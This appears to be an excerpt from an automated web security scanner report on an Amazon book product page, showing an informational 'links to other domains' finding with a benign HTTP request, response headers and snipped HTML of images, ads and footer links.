    <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" />
    If you need help or have a question for Customer Service, <a href="/gp/help/customer/display.html/ref=cm_r8n_hmd_contact?ie=UTF8&amp;nodeId=518316">
...[SNIP]...
<td>
           
   
                                                               <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" />&nbsp;Would you like to <b>
...[SNIP]...
<td>
    <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" />

Is there any other feedback you would like to provide?


    <b>
...[SNIP]...
<a href="/ref=footer_logo/180-2237308-2659866"><img src="http://g-ecx.images-amazon.com/images/G/01/gno/images/general/navAmazonLogoFooter._V192570482_.gif" width="126" alt="amazon.com" height="24" border="0" /></a>
...[SNIP]...
<div class="navFooterLine navFooterLinkLine navFooterPadItemLine">
<a href="http://www.amazon.ca">Canada</a>
<a href="http://www.amazon.cn">China</a>
<a href="http://www.amazon.fr">France</a>
<a href="http://www.amazon.de">Germany</a>
<a href="http://www.amazon.it">Italy</a>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.audible.com">Audible<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.dpreview.com">DPReview<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.endless.com">Endless<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.fabric.com">Fabric<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.imdb.com">IMDb<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.shopbop.com/welcome">Shopbop<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.smallparts.com">Small Parts<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.warehousedeals.com">Warehouse Deals<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.woot.com">Woot<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.zappos.com">Zappos<br/>
...[SNIP]...

22.376. http://www.amazon.com/gp/product/184968006X

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.amazon.com
Path:   /gp/product/184968006X

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /gp/product/184968006X?ie=UTF8&tag=silverlightnet-20&linkCode=xm2&camp=1789&creativeASIN=184968006X HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 15:58:25 GMT
Server: Server
x-amz-id-1: 0T7WHF7CTKFW7W3YBYG2
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: 8VXYB62IUxcteFrE5pCZEosARAXHXvVql/hcARlIEsxWMgciPqg2JHlfE53UGVQM
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=177-9736946-2435046; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: UserPref=UYNEXg3kwF1+Z1jX+JxTJl8W7LrjkeD6GLi7v16/ULeYuBdXfsPlk9Jg6Z38yR6jM5eccbs/0HqdVJWz/RKv4DuLfhmXz3QVBr7a6N3fN2A9+T5Yp2NOJfkYHg5NoESzKCwMKpplif0Te7jZlzFaz14My+LnABDY8yZKSeWiLOeqPInW/FohaQyrv7Ej8uMCut5dKI1KfyYMhhQIksmlGNaAA3UvXbMFKvTWQuGYwcsWcYw3sxgCWj4CgEDsMgPyZaH9q3QHOhCW3hUXauv9J60LOd4o18kNcSx00AxzzatFo40YR8rKCa0b0NrCRfkkbP6mO18uXq8IRK6c0FWvlv4PHb5S0/u+0DZtX52hfPxaQWyLcMKAOfrxTzzVJibXhyDKBdawGPUjrEo5Q05XD21NlKRByGb6p2KPOm/fNoSz1ZrIZpPTjrvVCFm0yEne04MSCaKjT+k=; path=/; domain=.amazon.com; expires=Sun Feb 06 15:58:25 2011 GMT
Content-Length: 401955


<html>
<head>


<style type="text/css"><!--


BODY { font-
...[SNIP]...
</style>


                <link rel="stylesheet" type="text/css" href="http://z-ecx.images-amazon.com/images/G/01/browser-scripts/fruitCSS/US-combined-1434113735.css._V175075384_.css" />


<link rel="stylesheet" type="text/css" href="http://z-ecx.images-amazon.com/images/G/01/nav2/gamma/dpCSS/US/combined-3484246616._V196377856_.css" />


<noscript><link type="text/css" rel="stylesheet" href="http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-no-js-3._V248984171_.css" /></noscript>

<link rel="stylesheet" type="text/css" href="http://z-ecx.images-amazon.com/images/G/01/kitchen/scheduled-delivery/sd_style-v1.1.1.0._V200598425_.css"/>


<link rel="stylesheet" type="text/css" href="http://z-ecx.images-amazon.com/images/G/01/browser-scripts/accessoriesCSS/US-combined-2965960588.css._V172139020_.css" />


   <link rel="stylesheet" type="text/css" href=http://z-ecx.images-amazon.com/images/G/01/productAds/css/detailPageStatic._V175408788_.css />

<style type="text/css">
...[SNIP]...
</style>


<link type='text/css' href='http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-1.2.6/site-wide-5869551106.css._V171084207_.css' rel='stylesheet'>
<link type='text/css' href='http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-4._V196325517_.css' rel='stylesheet'>
<link type='text/css' href='http://z-ecx.images-amazon.com/images/G/01/browser-scripts/dpMergedOverallCSS/dpMergedOverallCSS-8314507502.css._V196183329_.css' rel='stylesheet'>
<link type='text/css' href='http://z-ecx.images-amazon.com/images/G/01/nav2/gamma/ciuCSS/ciuCSS-ciuAnnotations-155.css._V174809499_.css' rel='stylesheet'>
<style type="text/css">
...[SNIP]...
</title>

<link title="Amazon Search Suggestions" rel="search" type="application/opensearchdescription+xml" href="http://d2lo25i6d3q8zm.cloudfront.net/browser-plugins/AmazonSearchSuggestionsOSD.DPIE.xml">


<!--[if IE]>
...[SNIP]...
</script>
<img src="http://g-ecx.images-amazon.com/images/G/01/gno/images/orangeBlue/navPackedSprites-US-16piv._V172849515_.png" style="display:none" alt=""/>
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" style="display:none" alt=""/>


<!--Pilu -->
...[SNIP]...
<div id="rwImages_hidden" style="display:none;">
<img src="http://ecx.images-amazon.com/images/I/412BbFUyhyL._BO2,204,203,200_PIsitb-sticker-arrow-click,TopRight,35,-76_AA300_SH20_OU01_.jpg" style="display:none;"/>
</div>
...[SNIP]...
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tl._V192253278_.gif" width="5" height="5" border="0" /></td>
<td class="subsDPTableTop"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tr._V192253274_.gif" width="5" height="5" border="0" /></td>
...[SNIP]...
<td class="subsDPTableLeft"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
...[SNIP]...
<td class="subsDPTableRight"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
...[SNIP]...
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-bl._V192199724_.gif" width="5" height="5" border="0" /></td>
<td class="subsDPTableBottom"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-br._V192253272_.gif" width="5" height="5" border="0" /></td>
...[SNIP]...
<a href="https://www.amazon.com/gp/tradein/add-to-cart.html/ref=trade_new_dp_trade_btn?ie=UTF8&asin=184968006X"><img src="http://g-ecx.images-amazon.com/images/G/01/tradein/buttons/button_tradein_here._V192193387_.gif" width="84" align="absmiddle" height="17" border="0" /></a>
...[SNIP]...
<a href="/gp/reader/184968006X/ref=sib_dp_pt#reader-link" onclick="if (typeof(SitbReader) != 'undefined') { SitbReader.LightboxActions.openReader('sib_dp_pt'); return false; }"><img onload="if (typeof uet == 'function') { uet('af'); }" src="http://ecx.images-amazon.com/images/I/412BbFUyhyL._BO2,204,203,200_PIsitb-sticker-arrow-click,TopRight,35,-76_AA300_SH20_OU01_.jpg" id="prodImage" width="300" height="300" onMouseOver="sitb_showLayer('bookpopover'); return false;" onMouseOut="sitb_doHide('bookpopover'); return false;" border="0" alt="Microsoft Silverlight 4 and SharePoint 2010 Integration" onmouseover="" /></a>
...[SNIP]...
<span>&nbsp;&nbsp;<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AGB5Le3YF5c5N-TdZohI-uiF0tNPl0XxD0WoI3vCm5gf8wyrwZO1wxjLpEUgo0kR.HN2dHeDUrLPqRBtPu4kKeeHF3jhDMWwX-R7CaQjzG6zNQ5GxWIEEEyH.-0lSZz2pWP.81Gavd69udXZSIbp9T7RBSxe9DEDIGQEWqc8PrpbGaM54ZFNXAvj9-.4nqhlR-CXaq1aHW7F2gyOwy5tGlTQuQyc3wsNgFsSPZ1oyX9Wrv9CVj5uvw2S3mD8tt03vhT12cfQMR3qxIbxa7c8MrxCkoHNEc07i6sCB4sT7spV893FRugttqg1Dk10luMU9TBzb81lItbs23ubDoqN-mTrlvnFNxqeH0gKE8x0KckM5E1ntas5ry8BFnJoRgUksacqU-D60TYkpQGM2u41Qjcdk0zGTovawh3Su9tZK5K2-lOzLts.g6F2Dd2kLIo2NxraQfHighlf7q6puZZ4qr0U3QISuhuLl8z.lVgdRAh8TmvcqP9T9.iA68h9l1Us0ZeFZAGAMLKnPtV1HIz38W5u55xTP1MjJTBU3uRNIqsKl4h-Tb0TTz1uS6J94547MrpSdmf76HoIVxadnaM-LDPJoClKVeQVYoGmDpCbMqH6Hn8VKm8OeJS9W-PYT0xP9JHq1oeN5STZ&awt=1&s=" rel="nofollow"><b>
...[SNIP]...
</a>
<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AGB5Le3YF5c5N-TdZohI-uiF0tNPl0XxD0WoI3vCm5gf8wyrwZO1wxjLpEUgo0kR.HN2dHeDUrLPqRBtPu4kKeeHF3jhDMWwX-R7CaQjzG6zNQ5GxWIEEEyH.-0lSZz2pWP.81Gavd69udXZSIbp9T7RBSxe9DEDIGQEWqc8PrpbGaM54ZFNXAvj9-.4nqhlR-CXaq1aHW7F2gyOwy5tGlTQuQyc3wsNgFsSPZ1oyX9Wrv9CVj5uvw2S3mD8tt03vhT12cfQMR3qxIbxa7c8MrxCkoHNEc07i6sCB4sT7spV893FRugttqg1Dk10luMU9TBzb81lItbs23ubDoqN-mTrlvnFNxqeH0gKE8x0KckM5E1ntas5ry8BFnJoRgUksacqU-D60TYkpQGM2u41Qjcdk0zGTovawh3Su9tZK5K2-lOzLts.g6F2Dd2kLIo2NxraQfHighlf7q6puZZ4qr0U3QISuhuLl8z.lVgdRAh8TmvcqP9T9.iA68h9l1Us0ZeFZAGAMLKnPtV1HIz38W5u55xTP1MjJTBU3uRNIqsKl4h-Tb0TTz1uS6J94547MrpSdmf76HoIVxadnaM-LDPJoClKVeQVYoGmDpCbMqH6Hn8VKm8OeJS9W-PYT0xP9JHq1oeN5STZ&awt=1&s=" rel="nofollow"><span class="Clickriver_swSprite Clickriver_s_extLink">
...[SNIP]...
<div class="SponsoredLinkDescription">
&nbsp;&nbsp;<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AGB5Le3YF5c5N-TdZohI-uiF0tNPl0XxD0WoI3vCm5gf8wyrwZO1wxjLpEUgo0kR.HN2dHeDUrLPqRBtPu4kKeeHF3jhDMWwX-R7CaQjzG6zNQ5GxWIEEEyH.-0lSZz2pWP.81Gavd69udXZSIbp9T7RBSxe9DEDIGQEWqc8PrpbGaM54ZFNXAvj9-.4nqhlR-CXaq1aHW7F2gyOwy5tGlTQuQyc3wsNgFsSPZ1oyX9Wrv9CVj5uvw2S3mD8tt03vhT12cfQMR3qxIbxa7c8MrxCkoHNEc07i6sCB4sT7spV893FRugttqg1Dk10luMU9TBzb81lItbs23ubDoqN-mTrlvnFNxqeH0gKE8x0KckM5E1ntas5ry8BFnJoRgUksacqU-D60TYkpQGM2u41Qjcdk0zGTovawh3Su9tZK5K2-lOzLts.g6F2Dd2kLIo2NxraQfHighlf7q6puZZ4qr0U3QISuhuLl8z.lVgdRAh8TmvcqP9T9.iA68h9l1Us0ZeFZAGAMLKnPtV1HIz38W5u55xTP1MjJTBU3uRNIqsKl4h-Tb0TTz1uS6J94547MrpSdmf76HoIVxadnaM-LDPJoClKVeQVYoGmDpCbMqH6Hn8VKm8OeJS9W-PYT0xP9JHq1oeN5STZ&awt=1&s=" rel="nofollow" class="SponsoredLinkDescriptionUrlLink">www.Rackspace.com/Sharepoint-Host</a>
...[SNIP]...
<span>&nbsp;&nbsp;<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AGeub4wodfg-qt6UeP56wQq1-Y9sQ3zdmpWbqrkmL5MI3KGyaebBCOWtKjxqHperWBLEB6NtkRZM3ncQ3Bimp27K3bTOwGTB5E2aMvoeowSTV6XOiIpttyfoL4L4WgKl.dTiAAU4QUejJbrNAQ3vWPI9wqb59PlUOY7-vr-pS3RGMo5AO1sofn4yMA43ON972v7EFTvfxxVfYV3chVUOY6A3nB3He-Vi243RdlzNdfHtBBPkiyjrfI0YpUI1awY2mX99-e2GCzIbUFqqwTfpDvo.WD6wHEW8kDrhJ3d45RgJ1EY2zxi3kBRAtOcCm0y4ZY9Q.J71oxnHu4ufDoo7QKQk442gEqrkbxO86RWvjePMC-wmp8lEd9g9uFnpVTInT53KHOanAdUoVvzIOm4BOLwfxnjtOaK5cnDGFZfadTAuxN1XgO5WyBHO1AOky0uGTuBlf75fnezIpqa2brJ7DwrfY.AVX14xaNFSw3r38TYYNAf0iS1BVuh9D0PeoHlQ8g1SV9K4F2ZRk-fowsU3oUtJAZ-fKr4Hyl3ze1-SY-eN6tGRFl8glnM_&awt=1&s=" rel="nofollow"><b>
...[SNIP]...
</a>
<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AGeub4wodfg-qt6UeP56wQq1-Y9sQ3zdmpWbqrkmL5MI3KGyaebBCOWtKjxqHperWBLEB6NtkRZM3ncQ3Bimp27K3bTOwGTB5E2aMvoeowSTV6XOiIpttyfoL4L4WgKl.dTiAAU4QUejJbrNAQ3vWPI9wqb59PlUOY7-vr-pS3RGMo5AO1sofn4yMA43ON972v7EFTvfxxVfYV3chVUOY6A3nB3He-Vi243RdlzNdfHtBBPkiyjrfI0YpUI1awY2mX99-e2GCzIbUFqqwTfpDvo.WD6wHEW8kDrhJ3d45RgJ1EY2zxi3kBRAtOcCm0y4ZY9Q.J71oxnHu4ufDoo7QKQk442gEqrkbxO86RWvjePMC-wmp8lEd9g9uFnpVTInT53KHOanAdUoVvzIOm4BOLwfxnjtOaK5cnDGFZfadTAuxN1XgO5WyBHO1AOky0uGTuBlf75fnezIpqa2brJ7DwrfY.AVX14xaNFSw3r38TYYNAf0iS1BVuh9D0PeoHlQ8g1SV9K4F2ZRk-fowsU3oUtJAZ-fKr4Hyl3ze1-SY-eN6tGRFl8glnM_&awt=1&s=" rel="nofollow"><span class="Clickriver_swSprite Clickriver_s_extLink">
...[SNIP]...
<div class="SponsoredLinkDescription">
&nbsp;&nbsp;<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AGeub4wodfg-qt6UeP56wQq1-Y9sQ3zdmpWbqrkmL5MI3KGyaebBCOWtKjxqHperWBLEB6NtkRZM3ncQ3Bimp27K3bTOwGTB5E2aMvoeowSTV6XOiIpttyfoL4L4WgKl.dTiAAU4QUejJbrNAQ3vWPI9wqb59PlUOY7-vr-pS3RGMo5AO1sofn4yMA43ON972v7EFTvfxxVfYV3chVUOY6A3nB3He-Vi243RdlzNdfHtBBPkiyjrfI0YpUI1awY2mX99-e2GCzIbUFqqwTfpDvo.WD6wHEW8kDrhJ3d45RgJ1EY2zxi3kBRAtOcCm0y4ZY9Q.J71oxnHu4ufDoo7QKQk442gEqrkbxO86RWvjePMC-wmp8lEd9g9uFnpVTInT53KHOanAdUoVvzIOm4BOLwfxnjtOaK5cnDGFZfadTAuxN1XgO5WyBHO1AOky0uGTuBlf75fnezIpqa2brJ7DwrfY.AVX14xaNFSw3r38TYYNAf0iS1BVuh9D0PeoHlQ8g1SV9K4F2ZRk-fowsU3oUtJAZ-fKr4Hyl3ze1-SY-eN6tGRFl8glnM_&awt=1&s=" rel="nofollow" class="SponsoredLinkDescriptionUrlLink">www.SharePointBestPractices.com</a>
...[SNIP]...
<span>&nbsp;&nbsp;<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AHEUeEYZHw82XX2TbjnZnQ0LSs-l6vjQitR6lYv5FK1o3fiDAuPESS3LfegUx1bITB17o6SGiA1ADUV9HmsfZVRCHVOG5LLMtXr.DEsfl-fA0jSYOF37s2fK41.mIMq1duwf9bc.EAu2kLT5tdOyEhCUlLNBSutrYo2ZvxCliONTScfR.J4jIlUc3ytdExg.qk4qbTndrlQpH7GMfbSTRZKv3SK5AswLgCSA3s64HokwcgrzU1EPqa9gGW1WINM147Njiv-uHrgdNYYkge8QeAGYP9x178C9m6Jpncs5KKY0daR0JYV8XpHyRSvEYbKzhYF-BY91PS5EhdRXjG.WIPTb7YstAIUdPqwV6ePkEfVmTvBG8US8kZsMIrUE-mHTC3W30M3Sf8orijmHnYDE-1-pwzIzbnVgxlnr66zgTlpNJylZVJ74gR-QR7aVC9KDRgxLpxmdrLMInkHqJW-w7UPFz8lSFTZcHv-f1pUuVE8CR5gBPYr-oTnuHj29-LuHxm75M22S.c4E5mrp.jr4mEcQhDgFAioUTirkq1-qMnNdDd7zmzo3QcDgbTJXqVAYkOWszh2CI3g.0A-f1zM.UyiXuKzPI3B2lnJwkY5qlTE9OEGh7Ua-oWY_&awt=1&s=" rel="nofollow"><b>
...[SNIP]...
</a>
<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AHEUeEYZHw82XX2TbjnZnQ0LSs-l6vjQitR6lYv5FK1o3fiDAuPESS3LfegUx1bITB17o6SGiA1ADUV9HmsfZVRCHVOG5LLMtXr.DEsfl-fA0jSYOF37s2fK41.mIMq1duwf9bc.EAu2kLT5tdOyEhCUlLNBSutrYo2ZvxCliONTScfR.J4jIlUc3ytdExg.qk4qbTndrlQpH7GMfbSTRZKv3SK5AswLgCSA3s64HokwcgrzU1EPqa9gGW1WINM147Njiv-uHrgdNYYkge8QeAGYP9x178C9m6Jpncs5KKY0daR0JYV8XpHyRSvEYbKzhYF-BY91PS5EhdRXjG.WIPTb7YstAIUdPqwV6ePkEfVmTvBG8US8kZsMIrUE-mHTC3W30M3Sf8orijmHnYDE-1-pwzIzbnVgxlnr66zgTlpNJylZVJ74gR-QR7aVC9KDRgxLpxmdrLMInkHqJW-w7UPFz8lSFTZcHv-f1pUuVE8CR5gBPYr-oTnuHj29-LuHxm75M22S.c4E5mrp.jr4mEcQhDgFAioUTirkq1-qMnNdDd7zmzo3QcDgbTJXqVAYkOWszh2CI3g.0A-f1zM.UyiXuKzPI3B2lnJwkY5qlTE9OEGh7Ua-oWY_&awt=1&s=" rel="nofollow"><span class="Clickriver_swSprite Clickriver_s_extLink">
...[SNIP]...
<div class="SponsoredLinkDescription">
&nbsp;&nbsp;<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AHEUeEYZHw82XX2TbjnZnQ0LSs-l6vjQitR6lYv5FK1o3fiDAuPESS3LfegUx1bITB17o6SGiA1ADUV9HmsfZVRCHVOG5LLMtXr.DEsfl-fA0jSYOF37s2fK41.mIMq1duwf9bc.EAu2kLT5tdOyEhCUlLNBSutrYo2ZvxCliONTScfR.J4jIlUc3ytdExg.qk4qbTndrlQpH7GMfbSTRZKv3SK5AswLgCSA3s64HokwcgrzU1EPqa9gGW1WINM147Njiv-uHrgdNYYkge8QeAGYP9x178C9m6Jpncs5KKY0daR0JYV8XpHyRSvEYbKzhYF-BY91PS5EhdRXjG.WIPTb7YstAIUdPqwV6ePkEfVmTvBG8US8kZsMIrUE-mHTC3W30M3Sf8orijmHnYDE-1-pwzIzbnVgxlnr66zgTlpNJylZVJ74gR-QR7aVC9KDRgxLpxmdrLMInkHqJW-w7UPFz8lSFTZcHv-f1pUuVE8CR5gBPYr-oTnuHj29-LuHxm75M22S.c4E5mrp.jr4mEcQhDgFAioUTirkq1-qMnNdDd7zmzo3QcDgbTJXqVAYkOWszh2CI3g.0A-f1zM.UyiXuKzPI3B2lnJwkY5qlTE9OEGh7Ua-oWY_&awt=1&s=" rel="nofollow" class="SponsoredLinkDescriptionUrlLink">Microsoft.com/Business</a>
...[SNIP]...
<a href="http://www.amazon.com/Microsoft-Silverlight-SharePoint-2010-Integration/dp/184968006X/ref=pd_bxgy_b_img_a"><img src="http://ecx.images-amazon.com/images/I/412BbFUyhyL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS75_.jpg" width="75" alt="Microsoft Silverlight 4 and SharePoint 2010 Integration" id="bxgy_img_a" height="75" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/SharePoint-Development-Visual-Studio-Microsoft/dp/0321718313/ref=pd_bxgy_b_img_b"><img src="http://ecx.images-amazon.com/images/I/51j5pqB8cxL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="75" alt="SharePoint 2010 Development with Visual Studio 2010 (Microsoft .NET Development Series)" id="bxgy_img_b" height="75" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Microsoft-SharePoint-2010-Solutions-Professionals/dp/1430228652/ref=pd_bxgy_b_img_c"><img src="http://ecx.images-amazon.com/images/I/514bKibhb7L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="75" alt="Microsoft SharePoint 2010: Building Solutions for SharePoint 2010 (Books for Professionals by Professionals)" id="bxgy_img_c" height="75" border="0" /></a>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/514bKibhb7L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51j5pqB8cxL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51iRGOliXtL._SL500_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/41kH6%2BdrJKL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51gaT-e4LjL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51yNm0-0X1L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div style="display: none" class="CustomerPopover_load"><img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-label._V192195535_.gif" width="73" alt="Loading&hellip;" height="14" border="0" /></div>
...[SNIP]...
<noscript>
<link type="text/css" rel="stylesheet" href="http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-no-js-3._V248984171_.css" />
</noscript>
...[SNIP]...
</div>

<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reviews/cfm._V192249942_.gif" width="1" alt="" onload="if (typeof uet == 'function') { uet('cf'); }" height="1" border="0" />

<br />
...[SNIP]...
<div style="display:none;" id="cg-div">
<img onload="if (typeof uet == 'function') { uet('cg'); } window.stageMarkers.stage('amznJQ.criticalFeature', 2);" src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" width="1" alt="" height="1" border="0" /><img onload="if (typeof uet == 'function') { uet('cg'); } window.stageMarkers.stage('amznJQ.criticalFeature', 2);" src="http://ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" width="1" alt="" height="1" border="0" />
</div>
...[SNIP]...
<div class="s9DpEntity" id="s9DpEntity" style="height: 200px;"><img style='padding-left: 130px; padding-top: 20px;' src='http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-large._V192195483_.gif' alt='loading' /><noscript>
...[SNIP]...
<td valign="top" class="faceout"><img src="http://ecx.images-amazon.com/images/I/412BbFUyhyL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS75_.jpg" width="50" alt="Microsoft Silverlight 4 and SharePoint 2010 Integration" height="50" border="0" /></td>
...[SNIP]...
<a href="http://www.amazon.com/SharePoint-Development-Visual-Studio-Microsoft/dp/0321718313/ref=pd_cp_b_1_img" id="pd_cp_b_1_img_0321718313" ><img src="http://ecx.images-amazon.com/images/I/51j5pqB8cxL._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg" width="50" alt="SharePoint 2010 Development with Visual Studio 2010 (Microsoft .NET Development Series)" height="50" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Professional-SharePoint-Branding-Interface-Programmer/dp/0470584645/ref=pd_cp_b_2_img" id="pd_cp_b_2_img_0470584645" ><img src="http://ecx.images-amazon.com/images/I/51iRGOliXtL._SL75_SS50_.jpg" width="50" alt="Professional SharePoint 2010 Branding and User Interface Design (Wrox Programmer to Programmer)" height="50" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Silverlight-4-Action-Pete-Brown/dp/1935182374/ref=pd_cp_b_3_img" id="pd_cp_b_3_img_1935182374" ><img src="http://ecx.images-amazon.com/images/I/512qJmTNIXL._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg" width="50" alt="Silverlight 4 in Action" height="50" border="0" /></a>
...[SNIP]...
<div class="loading_ind" style="text-align: center; width: 100%; display: none;">
<img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif" width="100" alt="Loading..." height="124" border="0" />
</div>
...[SNIP]...
<div class="loading_ind" style="display:none" width="100%">
<img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-large._V192195480_.gif" style="padding:8px 0px 0px 100px" />
</div>
...[SNIP]...
<div width="100%" style="display: none;" class="loading_ind">
<img style="padding: 8px 0px 0px 100px;" src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif"/>
</div>
...[SNIP]...
<div width="100%" style="display: none;" class="loading_ind">
<img style="padding: 8px 0px 0px 100px;" src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif"/>
</div>
...[SNIP]...
<div style="background-color:#eff7fe;border:1px solid #0f3c6d;padding:10px;text-align:left;" class="small">
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reputation/suggestionbox._V192249929_.gif" width="1" align="left" height="1" border="0" />
<div name="hmdFormDiv" id="hmdFormDiv">
...[SNIP]...
<td>
    <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" />
    If you need help or have a question for Customer Service, <a href="/gp/help/customer/display.html/ref=cm_r8n_hmd_contact?ie=UTF8&amp;nodeId=518316">
...[SNIP]...
<td>
           
   
                                                               <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" />&nbsp;Would you like to <b>
...[SNIP]...
<td>
    <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" />

Is there any other feedback you would like to provide?


    <b>
...[SNIP]...
<a href="/ref=footer_logo/177-9736946-2435046"><img src="http://g-ecx.images-amazon.com/images/G/01/gno/images/general/navAmazonLogoFooter._V192570482_.gif" width="126" alt="amazon.com" height="24" border="0" /></a>
...[SNIP]...
<div class="navFooterLine navFooterLinkLine navFooterPadItemLine">
<a href="http://www.amazon.ca">Canada</a>
<a href="http://www.amazon.cn">China</a>
<a href="http://www.amazon.fr">France</a>
<a href="http://www.amazon.de">Germany</a>
<a href="http://www.amazon.it">Italy</a>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.audible.com">Audible<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.dpreview.com">DPReview<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.endless.com">Endless<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.fabric.com">Fabric<br/>
